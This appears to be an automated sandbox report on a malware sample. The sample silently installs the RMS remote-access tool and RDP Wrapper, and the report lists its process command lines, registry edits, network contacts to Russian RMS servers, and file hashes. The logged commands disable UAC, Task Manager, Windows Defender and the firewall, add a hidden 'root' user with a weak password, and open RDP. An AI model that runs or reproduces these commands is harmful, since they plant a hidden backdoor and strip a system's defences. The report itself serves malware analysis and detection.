| N/A | N/A | C:\Windows\System32\svchost.exe | N/A |
Checks installed software on the system
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1" | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.ini | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| File created | C:\Program Files\RDP Wrapper\rdpwrap.dll | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.edb | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\ReportingEvents.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Logs\CBS\CBS.log | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe | N/A |
| File opened for modification | C:\Windows\WinSxS\pending.xml | C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe | N/A |
| File opened for modification | C:\Windows\WindowsUpdate.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log | C:\Windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\run.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\task.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe | N/A |
| N/A | N/A | C:\ProgramData\RDP\RDPWInst.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6.exe
"C:\Users\Admin\AppData\Local\Temp\c19874a8160089e1ea6d64fa76e15a0b0d348aa1a0260c72f1db77324231d0a6.exe"
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
"C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RMS\setup.bat" "
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\find.exe
find "rutserv.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im systemp.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im igfxtraise.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im RMS.exe
C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
RDP.exe
C:\ProgramData\RDP\run.exe
"C:\ProgramData\RDP\run.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\RDP\run.bat" "
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
uac.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9207.tmp\9208.bat C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe"
C:\Windows\system32\cmd.exe
Cmd /k Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
C:\Windows\system32\reg.exe
Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d "0" /f
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
task.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\98FC.tmp\98FD.bat C:\Users\Admin\AppData\Local\Temp\RMS\task.exe"
C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
defender.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9AD1.tmp\9AD2.bat C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe"
C:\Windows\system32\net.exe
net stop "WinDefend"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WinDefend"
C:\Windows\SysWOW64\net.exe
net user root /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user root /add
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "MSASCui.exe"
C:\Windows\SysWOW64\net.exe
net localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Çñ¼¿¡¿ßΓαáΓ«αδ root /add
C:\Windows\SysWOW64\net.exe
net user root 12345
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user root 12345
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
firewall.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\10FB.tmp\10FC.bat C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe"
C:\Windows\system32\net.exe
net stop "MpsSvc"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "MpsSvc"
C:\Windows\system32\taskkill.exe
taskkill /f /t /im "FirewallControlPanel.exe"
C:\Windows\SysWOW64\timeout.exe
timeout 2
C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v root /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /silentinstall
C:\ProgramData\RDP\RDPWInst.exe
"C:\ProgramData\RDP\RDPWInst.exe" -i -o
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /firewall
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
rutserv.exe /start
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe /tray
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Local\Temp\RMS" /S /D
C:\Windows\SysWOW64\attrib.exe
attrib +r +a +s +h "C:\Users\Admin\AppData\Local\Temp" /S /D
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe /tray
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RMS\remsetup.bat" "
C:\ProgramData\RDP\RDPWInst.exe
"C:\ProgramData\RDP\RDPWInst.exe" -w
C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | settings-win.data.microsoft.com | udp |
| NL | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl3.digicert.com | udp |
| US | 72.21.91.29:80 | crl3.digicert.com | tcp |
| US | 72.21.91.29:80 | crl3.digicert.com | tcp |
| US | 72.21.91.29:80 | crl3.digicert.com | tcp |
| US | 72.21.91.29:80 | crl3.digicert.com | tcp |
| NL | 51.124.78.146:443 | settings-win.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | crl4.digicert.com | udp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| US | 8.8.8.8:53 | settings-win.data.microsoft.com | udp |
| US | 52.167.17.97:443 | settings-win.data.microsoft.com | tcp |
| US | 52.167.17.97:443 | settings-win.data.microsoft.com | tcp |
| US | 52.167.17.97:443 | settings-win.data.microsoft.com | tcp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | rmansys.ru | udp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| RU | 31.31.198.18:80 | rmansys.ru | tcp |
| US | 8.8.8.8:53 | rms-server.tektonit.ru | udp |
| RU | 95.213.205.83:5655 | rms-server.tektonit.ru | tcp |
| US | 93.184.220.29:80 | crl4.digicert.com | tcp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
C:\Users\Admin\AppData\Local\Temp\RMS\setup.exe
| MD5 | 2467d033a2c235d6955811524c105422 |
| SHA1 | ac9e48abb0f3aa5030f0e6bc5deba7bef921c1a3 |
| SHA256 | 413b364b30ab4d918ae4a4e9b50e45287dceeaeda8766dab7ae79fd849c0054a |
| SHA512 | 48a3279da9b1c3b44540fca5de4f1de1d405b857697d019dc1c2f08231c5fe705f22b71961b9bd74c8bbc20c7b583011872fed5751aae7d21089c5a5c4546404 |
C:\Users\Admin\AppData\Local\Temp\RMS\setup.bat
| MD5 | 29e13072fa219a53afa88d84ffc17903 |
| SHA1 | e0d2a5ea26982260471588775dceb3a60b3a2d01 |
| SHA256 | d9ca40913b5a976f4b7e07ed83adc217c94730f60ab7e9307d8a5ba4d287387b |
| SHA512 | 314449c87df12cfc4d770ff72f5816eadc5336503104480ec0482aa1918be1730a3d3a580dd1c17669c55d473de4e5df6d035ef8e32e0f8326eac8bf58f0b120 |
memory/3836-133-0x0000025434320000-0x0000025434330000-memory.dmp
memory/3836-134-0x0000025434380000-0x0000025434390000-memory.dmp
memory/3836-135-0x0000025436A50000-0x0000025436A54000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
| MD5 | 432ffc627865aa735aace14cd8a59b30 |
| SHA1 | fe3b916cedbdc4b0293c49378659cc2c4e68be7d |
| SHA256 | 01ac35a35fa0fa9eee05dfe8e12a7625e81904c69d853bdf999c4e95538e6b27 |
| SHA512 | e4fd5a0b08aa2321d06d578012ac1b0e7e53b06920ae75d6d8d5091fc10b3cdcd2c468eda3cfd0092107d0c9af042894f2f1b8e32255e6a11954a1e65e860f78 |
C:\Users\Admin\AppData\Local\Temp\RMS\RDP.exe
| MD5 | 432ffc627865aa735aace14cd8a59b30 |
| SHA1 | fe3b916cedbdc4b0293c49378659cc2c4e68be7d |
| SHA256 | 01ac35a35fa0fa9eee05dfe8e12a7625e81904c69d853bdf999c4e95538e6b27 |
| SHA512 | e4fd5a0b08aa2321d06d578012ac1b0e7e53b06920ae75d6d8d5091fc10b3cdcd2c468eda3cfd0092107d0c9af042894f2f1b8e32255e6a11954a1e65e860f78 |
C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp
| MD5 | 8708699d2c73bed30a0a08d80f96d6d7 |
| SHA1 | 684cb9d317146553e8c5269c8afb1539565f4f78 |
| SHA256 | a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f |
| SHA512 | 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264 |
C:\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
C:\ProgramData\RDP\run.exe
| MD5 | c4f61801834172c1f1973e8791311340 |
| SHA1 | de48c219435feda6680c474b445c8f548441abc7 |
| SHA256 | c396dcc91a1fe215773eef9435d35734d76e7324ba1a40b46fa15f43acb3488d |
| SHA512 | 8fc16d1375f20a531593873aac252f0394315004bc51e55e14c0e93f2ea76272a6965da30228a7f16e01e1e42a49ec759afd46c6b914154c766c1a8d39b2a0b7 |
memory/4396-141-0x00000000021F0000-0x00000000021F1000-memory.dmp
C:\ProgramData\RDP\run.bat
| MD5 | 4e6a1033e3c2f39db397d392fe0d7c77 |
| SHA1 | 11526234cd216334902d51665529c2b9be7acc05 |
| SHA256 | 2eb8001ce06e7b2764fb7b4e637d53583e365640e72a3d53e1d3b4790ae306d4 |
| SHA512 | 395293d8ecd67f4c32702b11fdf0761f9e283346274ee1e4c4a3f47672fc683be4917fd87da2fde4e3d7e986e3884799329f9f28082e89f75aa17ca38c46dceb |
C:\Users\Admin\AppData\Local\Temp\RMS\regedit.reg
| MD5 | aae4fbd269f5d65a222f2db994b1c6e3 |
| SHA1 | cb4dafc589459b6eb1e69dd17e1718e8ac0b3f72 |
| SHA256 | e8ba276486dd6a256dbc0865c74521e8d3e26c735806c695c5c386f82663441c |
| SHA512 | e5660a4c8df0faf0db2dda9c09d18b606a97f4687ad9d4fe03fac39cf608adac21529fffa2f595a701ecde88d43d10390cdfbea2e9e6b9d7931e47f8254d0b71 |
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
| MD5 | 84149257a74fae3b2922fb79e181fee2 |
| SHA1 | f0cbb804568971a8b990f01f8d07297c05fc44c0 |
| SHA256 | 4212603874d5211ba80331e24fd223a1788523d6a454b9aef3df8edc0a7d31bf |
| SHA512 | be90490ba50717b3b0a0f4bceee71c773add208b58d72d088cd6da59607fe7a8d4f3ccc676b14c3bd4aa8e056fa1cb9dff81f004a6789d9c2a1be6f6c655696c |
C:\Users\Admin\AppData\Local\Temp\RMS\uac.exe
| MD5 | 84149257a74fae3b2922fb79e181fee2 |
| SHA1 | f0cbb804568971a8b990f01f8d07297c05fc44c0 |
| SHA256 | 4212603874d5211ba80331e24fd223a1788523d6a454b9aef3df8edc0a7d31bf |
| SHA512 | be90490ba50717b3b0a0f4bceee71c773add208b58d72d088cd6da59607fe7a8d4f3ccc676b14c3bd4aa8e056fa1cb9dff81f004a6789d9c2a1be6f6c655696c |
C:\Users\Admin\AppData\Local\Temp\9207.tmp\9208.bat
| MD5 | 41bd62ba30ba68ec4e214aafabf25804 |
| SHA1 | fd45aed5758f99872e130e60635f2acef76645e8 |
| SHA256 | e4a4aae0922f7dd92cf300fb6add8f3141101ac281d88de8514deb14af2c0af0 |
| SHA512 | 0b382d7ed4a40cfea9d5097c1ce41960323732c1892293f6c85263030493e0b01add165373ec8a83d11fd4562027552b69a4eea6d2f5791278d8f390ff37f63e |
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
| MD5 | b7d30e5c315855dde61bf985ef00ebe4 |
| SHA1 | 28c5edcd97e0e7338bc794174b3bfa3e4cbf5867 |
| SHA256 | f995083a06ac84ba368846278b44d5f91cde0b7f09f4adbabd91fcdffa395165 |
| SHA512 | 7519654a477a55ea282b5a0f384d9bbf6ea11c525260954c9fea6b188bf10c371a9266da3d95cb1d363921c6a207db4a45ba9242d7a1570b2cc3c3523fa1bc90 |
C:\Users\Admin\AppData\Local\Temp\RMS\task.exe
| MD5 | b7d30e5c315855dde61bf985ef00ebe4 |
| SHA1 | 28c5edcd97e0e7338bc794174b3bfa3e4cbf5867 |
| SHA256 | f995083a06ac84ba368846278b44d5f91cde0b7f09f4adbabd91fcdffa395165 |
| SHA512 | 7519654a477a55ea282b5a0f384d9bbf6ea11c525260954c9fea6b188bf10c371a9266da3d95cb1d363921c6a207db4a45ba9242d7a1570b2cc3c3523fa1bc90 |
C:\Users\Admin\AppData\Local\Temp\98FC.tmp\98FD.bat
| MD5 | 973b0c9d6042bbdd0d78547bcc6bf036 |
| SHA1 | 2c352764d8410f19fc14f1a95db17e744ee55723 |
| SHA256 | 187bacda7879e31e4f29a027392a4e4fea81bfc2f86abd48c3079ff969c82797 |
| SHA512 | 8e5ee11a935e902b4d282a3057229535615571e2360e7e73b513fff7dfee34a9e30b1858b9e0d9790bf8e15f92607a46e9a81a1bba6122f4976aa0a77ec8b2b4 |
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
| MD5 | b8a928d6df0741b9a2ee7b678a27f817 |
| SHA1 | c61fc60feb264be97628b4bad0633c31da987076 |
| SHA256 | 73e0dc6d8451996737727f9167a8e2a6924461c3d076d6f5506946393be9e3dc |
| SHA512 | afe353f3845675f31843e5e2ecf7d81586e52ea3b6d91107b4e2e703c34d8f28222fdb007f31893b3c833f532053ee30d50e8e10665734a5706029f7eba67c24 |
C:\Users\Admin\AppData\Local\Temp\RMS\defender.exe
| MD5 | b8a928d6df0741b9a2ee7b678a27f817 |
| SHA1 | c61fc60feb264be97628b4bad0633c31da987076 |
| SHA256 | 73e0dc6d8451996737727f9167a8e2a6924461c3d076d6f5506946393be9e3dc |
| SHA512 | afe353f3845675f31843e5e2ecf7d81586e52ea3b6d91107b4e2e703c34d8f28222fdb007f31893b3c833f532053ee30d50e8e10665734a5706029f7eba67c24 |
C:\Users\Admin\AppData\Local\Temp\9AD1.tmp\9AD2.bat
| MD5 | cc5b5df2834515d622d1c0a1bd4eadd2 |
| SHA1 | b1835556b419f667ac72c0de1383c470ad0469ea |
| SHA256 | 29dad257f98000f3603a882d1999e4934ec8e36907fd8222efff827be9d81fc8 |
| SHA512 | eb635c1f2f1d93215e64721da726da9034c580db74b0c0d2e085ef13e2e4562517a82087a6dcd6a06a5570bf3f19e5b0dc24ad1a32160fcb0e652f9a9ee6b121 |
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
| MD5 | 4954a72ec5e52b469bf63aa3dcff8b16 |
| SHA1 | 6cc0554e335d60b6953b75e814e161c63a409907 |
| SHA256 | b964f4411acc021b33d0c10cbb565ad1cdee329973a27636566c11f4a5adf31f |
| SHA512 | bde89d6063d73b3393753541c384d77316134b7a2718307c7d1b4221e1724d378aeedfb7c4141616b13934a35514aa7a92a11ccd93da2fc49f0db96f22d97b46 |
C:\Users\Admin\AppData\Local\Temp\RMS\firewall.exe
| MD5 | 4954a72ec5e52b469bf63aa3dcff8b16 |
| SHA1 | 6cc0554e335d60b6953b75e814e161c63a409907 |
| SHA256 | b964f4411acc021b33d0c10cbb565ad1cdee329973a27636566c11f4a5adf31f |
| SHA512 | bde89d6063d73b3393753541c384d77316134b7a2718307c7d1b4221e1724d378aeedfb7c4141616b13934a35514aa7a92a11ccd93da2fc49f0db96f22d97b46 |
C:\Users\Admin\AppData\Local\Temp\10FB.tmp\10FC.bat
| MD5 | 902125bcd29f2c1e3ed47513b07d952a |
| SHA1 | d47f45491e758c68e602bf74f8b2c95e1f955800 |
| SHA256 | 176905e7abb1f5a0ff31aef142dcc5ec85905784a8b7c33f28cef970d3c673c3 |
| SHA512 | 7a1a77adfd457d07568e05af3b46d50bdc0dc79dc15533b702c8733930aff0e961acd2c2179c6742feab686515fa64dd915095e25564a47ea6ab6c47a813ff00 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\ProgramData\RDP\RDPWInst.exe
| MD5 | 9c257b1d15817a818a675749f0429130 |
| SHA1 | 234d14da613c1420ea17de60ab8c3621d1599f6f |
| SHA256 | b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c |
| SHA512 | b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521 |
C:\ProgramData\RDP\RDPWInst.exe
| MD5 | 9c257b1d15817a818a675749f0429130 |
| SHA1 | 234d14da613c1420ea17de60ab8c3621d1599f6f |
| SHA256 | b92962c2b4794ee418f0248743131d472a10ac96e520dda2afddf8ca3f3cd64c |
| SHA512 | b63fb6ba7b622f95fc151ca62c339368991c3c4c22e4bbe2305ac7172ee3f10e5049850e87cf3b87a13f4f15c516fbd20cadde9197064b659ffc66599e71d521 |
memory/1660-160-0x00000000010C0000-0x00000000010C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
memory/4320-162-0x00000000010C0000-0x00000000010C1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
C:\Users\Admin\AppData\Local\Temp\RMS\rutserv.exe
| MD5 | ac216697481b39f9aa052936adaba8ac |
| SHA1 | d6d96811528c118a34874260376f2e43296c836d |
| SHA256 | 320f301daca3f6fad4d61601fa883624dcde52fe48ac12b3e08476b651390a76 |
| SHA512 | c5cad4beaa41faad6dd834eb84288559818fa3b9542cefe2250d67f225f5af0a065008dc40d9fa17382bb8fb427c2de0edfef790fc714a6186c602d6fe6bdb14 |
memory/2080-165-0x0000000000F80000-0x0000000000F81000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RMS\vp8decoder.dll
| MD5 | 0a98acb6e3389b806970d6b8afe849c3 |
| SHA1 | b9265779510c0f444ca58f6f6b3286d0f0439b77 |
| SHA256 | 733f5b78a50ffe54ab315efed57d3821be0b65e3f5db9c62607c904fb5efbf3f |
| SHA512 | 33b6d5b567536c32ad1553e664c357b301f89f2c60a3c0d37e7d73a295404706c80fce66d6d124a4b4293e13253267fcfeca482e387a5acb5ab04e57c5a54177 |
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
| SHA256 | 04d5a7824dca49e7a1b170b3050b83a0eced83543bd860924de9faeb2c40a703 |
| SHA512 | a078f9a0d7979f793b4e0976fe369869e0e425ad139c86f3b9be2ae2386f7bc6f116c3ea8dc17ffbc0f003df0ef953535e638acf18e427f2797f46b1deae773c |
C:\Users\Admin\AppData\Local\Temp\RMS\vp8encoder.dll
| MD5 | 33425d50b3f3837bd129dbd22f60de00 |
| SHA1 | 81c8e05b1283d7e993aec25c7341e48678047249 |
| SHA256 | 521d85e9116c6a660a463340c1d5f91d1c50f7ef5f18081e58f6d57b33a56756 |
| SHA512 | 496cf0734dbbeacaa74b64fe5e8e1ed628bde736dba5ab91097bdc237ad95183cb3252503203f17810cd927cfa978d1794af7479163f794bb27f822aa3af4c58 |
C:\Users\Admin\AppData\Local\Temp\RMS\rfusclient.exe
| MD5 | ef6333a371161c3244425b5355cf4a85 |
| SHA1 | dd9b0c91c929b505dae93fe7e80bec5954591d73 |
